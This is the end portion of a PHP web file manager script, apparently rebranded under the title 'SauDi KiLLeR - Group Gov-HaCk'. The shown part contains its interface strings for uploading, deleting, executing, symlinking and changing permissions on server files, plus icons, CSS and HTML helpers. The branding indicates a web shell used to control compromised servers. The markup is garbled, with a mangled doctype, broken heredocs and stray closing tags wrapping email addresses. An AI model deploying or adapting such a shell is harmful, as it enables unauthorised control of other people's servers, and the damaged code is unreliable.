'create_symlink' => 'create symlink', 'delete' => 'delete', 'rename' => 'rename', 'move' => 'move', 'copy' => 'copy', 'edit' => 'edit', 'download' => 'download', 'upload' => 'upload', 'create' => 'create', 'change' => 'change', 'save' => 'save', 'set' => 'set', 'reset' => 'reset', 'relative' => 'Relative path to target', 'yes' => 'Yes', 'no' => 'No', 'back' => 'back', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'no output', 'user' => 'User', 'password' => 'Password', 'add' => 'add', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" has been uploaded.', 'not_uploaded' => '"[%1]" could not be uploaded.', 'already_exists' => '"[%1]" already exists.', 'created' => '"[%1]" has been created.', 'not_created' => '"[%1]" could not be created.', 'really_delete' => 'Delete these files?', 'deleted' => "These files have been deleted:\n[%1]", 'not_deleted' => "These files could not be deleted:\n[%1]", 'rename_file' => 'Rename file:', 'renamed' => '"[%1]" has been renamed to "[%2]".', 'not_renamed' => '"[%1] could not be renamed to "[%2]".', 'move_files' => 'Move these files:', 'moved' => "These files have been moved to \"[%2]\":\n[%1]", 'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]", 'copy_files' => 'Copy these files:', 'copied' => "These files have been copied to \"[%2]\":\n[%1]", 'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]", 'not_edited' => '"[%1]" can not be edited.', 'executed' => "\"[%1]\" has been executed successfully:\n{%2}", 'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}", 'saved' => '"[%1]" has been saved.', 'not_saved' => '"[%1]" could not be saved.', 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.', 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.', 'permission_for' => 'Permission of "[%1]":', 'permission_set' => 'Permission of "[%1]" was set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" can not be read.' ); } } function getimage ($image) { switch ($image) { case 'file': return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA'); case 'folder': return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'); case 'hidden_file': return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA'); case 'link': return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA'); case 'smiley': return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA='); case 'arrow': return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw=='); } } function html_header () { global $site_charset; echo <<<end <!doctype="" html="" public="" "-="" w3c="" dtd="" xhtml="" 1.0="" strict="" en"="" "http:="" www.w3.org="" tr="" xhtml1="" xhtml1-strict.dtd"=""> <meta http-equiv="Content-Type" content="text/html; charset=$site_charset"> <title>SauDi KiLLeR - Group Gov-HaCk</title> <style type="text/css"> body { font: small sans-serif; text-align: center } img { width: 17px; height: 13px } a, a:visited { text-decoration: none; color: navy } hr { border-style: none; height: 1px; background-color: silver; color: silver } #main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px } #main th { background: #eee; padding: 3pt 3pt 0pt 3pt } .listing th, .listing td { padding: 1px 3pt 0 3pt } .listing th { border: 1px solid silver } .listing td { border: 1px solid #ddd; background: white } .listing .checkbox { text-align: center } .listing .filename { text-align: left } .listing .size { text-align: right } .listing .permission_header { text-align: left } .listing .permission { font-family: monospace } .listing .owner { text-align: left } .listing .group { text-align: left } .listing .functions { text-align: left } .listing_footer td { background: #eee; border: 1px solid silver } #directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt } #directory { background: #eee; border: 1px solid silver } #upload { padding-top: 1em } #create { padding-bottom: 1em } .small, .small option { font-size: x-small } textarea { border: none; background: white } table.dialog { margin-left: auto; margin-right: auto } td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align: center } #permission { margin-left: auto; margin-right: auto } #permission td { padding-left: 3pt; padding-right: 3pt; text-align: center } td.permission_action { text-align: right } #symlink { background: #eee; border: 1px solid silver } #symlink td { text-align: left; padding: 3pt } #red_button { width: 120px; color: #400 } #green_button { width: 120px; color: #040 } #error td { background: maroon; color: white; border: 1px solid silver } #notice td { background: green; color: white; border: 1px solid silver } #notice pre, #error pre { background: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex } code { font-size: 12pt } td { white-space: nowrap } </style> <script type="text/javascript"> <!-- function activate (name) { if (document && document.forms[0] && document.forms[0].elements['focus']) { document.forms[0].elements['focus'].value = name; } } //--> </script> END; } function html_footer () { echo <<<end <="" body=""> END; } function notice ($phrase) { global $cols; $args = func_get_args(); array_shift($args); return ' ' . phrase($phrase, $args) . ' '; } function error ($phrase) { global $cols; $args = func_get_args(); array_shift($args); return ' ' . phrase($phrase, $args) . ' '; } ?> </end></end></i0x0@hotmail.com></nzunta@gabriele-erba.it></till@tuxen.de></i0x0@hotmail.com></nzunta@gabriele-erba.it></anders@wiik.cc></daloan@guideo.fr></i0x0@hotmail.com></nederkoorn@tiscali.nl></sil@hotmail.com></lars@soelgaard.net></szuniga@vtr.net></sil@hotmail.com></j@kub.cz></okankan@stud.sdu.edu.tr></sil@hotmail.com>